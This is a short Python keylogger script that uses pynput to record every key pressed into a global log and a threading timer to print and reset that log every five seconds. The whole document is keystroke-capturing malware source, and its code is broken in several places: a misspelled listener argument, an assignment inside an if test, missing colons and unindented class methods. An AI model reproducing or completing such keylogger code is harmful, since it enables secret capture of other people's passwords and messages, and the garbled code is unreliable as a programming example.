#!usr/bin/python

import pynput.keyboard
import threading

log =""

class Keylogger:

def process_key_press(self,key):
    global log
    try:
        log=log+str(key.char)
    except AttributeError:
        if key=key.space
           log=log+" "
        else:
            log=log+" "+str(key)+" "    
    
    print(log)


#We are using threading concept to report the log for a certain period of time. This threading allowas the keyboard listener function to execute without any interruption and also it runs timer on other hand. 

def report(self):  
    global log
    print(log)
    log=" "
    timer=threading.Timer(5, report)
    timer.start()

keyboard_listener=pynput.keyboard.Listener(on_pres2s=process_key_press)

with keyboard_listener:
    keyboard_listener.join()